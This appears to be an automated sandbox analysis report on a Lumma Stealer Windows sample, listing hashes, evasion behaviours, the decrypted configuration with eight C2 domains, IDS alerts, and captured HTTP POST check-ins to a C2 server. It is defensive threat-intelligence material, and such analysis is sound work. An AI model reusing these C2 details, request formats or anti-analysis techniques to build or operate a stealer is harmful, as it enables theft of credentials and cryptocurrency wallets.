
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532571
MD5: fb08a9067fae7bfd248416c863bd43d2
SHA1: 1564f87b3da33b611dcb92dd5ff7362220af474a
SHA256: b649fde943868879f85d809bf5e84d9873b1c5ed308941e19cebb3ea6a230aff
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • file.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FB08A9067FAE7BFD248416C863BD43D2)
    • WerFault.exe (PID: 7716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 1920 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["licendfilteo.site", "studennotediw.store", "bathdoomgaz.store", "mobbipenju.store", "spirittunek.store", "dissapoiznw.store", "clearancek.site", "eaglepawnoy.store"], "Build id": "1i4--Ds"}
Source: decrypted.memstr
Rule: JoeSecurity_LummaCStealer_2
Description: Yara detected LummaC Stealer
Author: Joe Security
Strings: (none)
    No Sigma rule has matched
    Timestamp                        SID      Severity  Classtype                              Source IP    Source Port  Destination IP  Destination Port  Protocol
    2024-10-13T17:46:15.252363+0200  2054653  1         A Network Trojan was detected          192.168.2.7  49714        172.67.206.204  443               TCP
    2024-10-13T17:46:16.505914+0200  2054653  1         A Network Trojan was detected          192.168.2.7  49719        172.67.206.204  443               TCP
    2024-10-13T17:46:15.252363+0200  2049836  1         A Network Trojan was detected          192.168.2.7  49714        172.67.206.204  443               TCP
    2024-10-13T17:46:16.505914+0200  2049812  1         A Network Trojan was detected          192.168.2.7  49719        172.67.206.204  443               TCP
    2024-10-13T17:46:13.202147+0200  2056477  1         Domain Observed Used for C2 Detected   192.168.2.7  53860        1.1.1.1         53                UDP
    2024-10-13T17:46:12.993655+0200  2056471  1         Domain Observed Used for C2 Detected   192.168.2.7  59340        1.1.1.1         53                UDP
    2024-10-13T17:46:13.171047+0200  2056481  1         Domain Observed Used for C2 Detected   192.168.2.7  64781        1.1.1.1         53                UDP
    2024-10-13T17:46:13.157597+0200  2056483  1         Domain Observed Used for C2 Detected   192.168.2.7  55704        1.1.1.1         53                UDP
    2024-10-13T17:46:13.225766+0200  2056473  1         Domain Observed Used for C2 Detected   192.168.2.7  57019        1.1.1.1         53                UDP
    2024-10-13T17:46:13.143968+0200  2056485  1         Domain Observed Used for C2 Detected   192.168.2.7  61611        1.1.1.1         53                UDP
    2024-10-13T17:46:13.214638+0200  2056475  1         Domain Observed Used for C2 Detected   192.168.2.7  60932        1.1.1.1         53                UDP
    2024-10-13T17:46:13.182860+0200  2056479  1         Domain Observed Used for C2 Detected   192.168.2.7  51538        1.1.1.1         53                UDP
    2024-10-13T17:46:14.500243+0200  2858666  1         Domain Observed Used for C2 Detected   192.168.2.7  49709        104.102.49.254  443               TCP

    AV Detection

    Source: file.exe | Avira: detected
    Source: https://steamcommunity.com/profiles/76561199724331900 | URL Reputation: Label: malware
    Source: https://steamcommunity.com:443/profiles/76561199724331900 | URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ | URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badges | URL Reputation: Label: malware
    Source: file.exe.7352.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["licendfilteo.site", "studennotediw.store", "bathdoomgaz.store", "mobbipenju.store", "spirittunek.store", "dissapoiznw.store", "clearancek.site", "eaglepawnoy.store"], "Build id": "1i4--Ds"}
    Source: sergei-esenin.com | Virustotal: Detection: 17%
    Source: licendfilteo.site | Virustotal: Detection: 15%
    Source: eaglepawnoy.store | Virustotal: Detection: 18%
    Source: spirittunek.store | Virustotal: Detection: 21%
    Source: studennotediw.store | Virustotal: Detection: 17%
    Source: mobbipenju.store | Virustotal: Detection: 21%
    Source: dissapoiznw.store | Virustotal: Detection: 21%
    Source: bathdoomgaz.store | Virustotal: Detection: 21%
    Source: clearancek.site | Virustotal: Detection: 17%
    Source: dissapoiznw.store | Virustotal: Detection: 21%
    Source: https://eaglepawnoy.store:443/api | Virustotal: Detection: 21%
    Source: studennotediw.store | Virustotal: Detection: 17%
    Source: https://sergei-esenin.com:443/api% | Virustotal: Detection: 9%
    Source: eaglepawnoy.store | Virustotal: Detection: 18%
    Source: bathdoomgaz.store | Virustotal: Detection: 21%
    Source: https://sergei-esenin.com:443/api | Virustotal: Detection: 18%
    Source: https://sergei-esenin.com/apiJ | Virustotal: Detection: 9%
    Source: clearancek.site | Virustotal: Detection: 17%
    Source: spirittunek.store | Virustotal: Detection: 21%
    Source: licendfilteo.site | Virustotal: Detection: 15%
    Source: https://studennotediw.store:443/api | Virustotal: Detection: 21%
    Source: file.exe | Virustotal: Detection: 53%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: file.exe | Joe Sandbox ML: detected
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: clearancek.site
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: licendfilteo.site
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: spirittunek.store
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: bathdoomgaz.store
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: studennotediw.store
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: dissapoiznw.store
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: eaglepawnoy.store
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: mobbipenju.store
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: clearancek.site
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4SD0y4--legendaryy
    Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49709 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49714 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49719 version: TLS 1.2

    Networking

    Source: Network traffic | Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:55704 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:64781 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:59340 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:61611 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:60932 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:57019 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:51538 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:53860 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49709 -> 104.102.49.254:443
    Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49719 -> 172.67.206.204:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49714 -> 172.67.206.204:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49714 -> 172.67.206.204:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49719 -> 172.67.206.204:443
    Source: Malware configuration extractor | URLs: licendfilteo.site
    Source: Malware configuration extractor | URLs: studennotediw.store
    Source: Malware configuration extractor | URLs: bathdoomgaz.store
    Source: Malware configuration extractor | URLs: mobbipenju.store
    Source: Malware configuration extractor | URLs: spirittunek.store
    Source: Malware configuration extractor | URLs: dissapoiznw.store
    Source: Malware configuration extractor | URLs: clearancek.site
    Source: Malware configuration extractor | URLs: eaglepawnoy.store
    Source: Joe Sandbox View | IP Address: 104.102.49.254
    Source: Joe Sandbox View | IP Address: 172.67.206.204
    Source: Joe Sandbox View | ASN Name: AKAMAI-ASUS
    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global traffic | HTTP traffic detected:
        GET /profiles/76561199724331900 HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Host: steamcommunity.com
    Source: global traffic | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: sergei-esenin.com
    Source: global traffic | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        Cookie: __cf_mw_byp=cKYJNG4PUdZgy2T2WC.4u4JOPeXDHIGLF0EcZVHEveg-1728834375-0.0.1.1-/api
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 52
        Host: sergei-esenin.com
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | HTTP traffic detected:
        GET /profiles/76561199724331900 HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Host: steamcommunity.com
    Source: global traffic | DNS traffic detected: DNS query: clearancek.site
    Source: global traffic | DNS traffic detected: DNS query: mobbipenju.store
    Source: global traffic | DNS traffic detected: DNS query: eaglepawnoy.store
    Source: global traffic | DNS traffic detected: DNS query: dissapoiznw.store
    Source: global traffic | DNS traffic detected: DNS query: studennotediw.store
    Source: global traffic | DNS traffic detected: DNS query: bathdoomgaz.store
    Source: global traffic | DNS traffic detected: DNS query: spirittunek.store
    Source: global traffic | DNS traffic detected: DNS query: licendfilteo.site
    Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
    Source: global traffic | DNS traffic detected: DNS query: sergei-esenin.com
    Source: unknown | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: sergei-esenin.com
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.akamai.steamstatic
    Source: file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://clearancek.site:443/apiz
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akam
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamsta
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.co
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilevC
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vP
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vP05w
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGt
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_resp
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
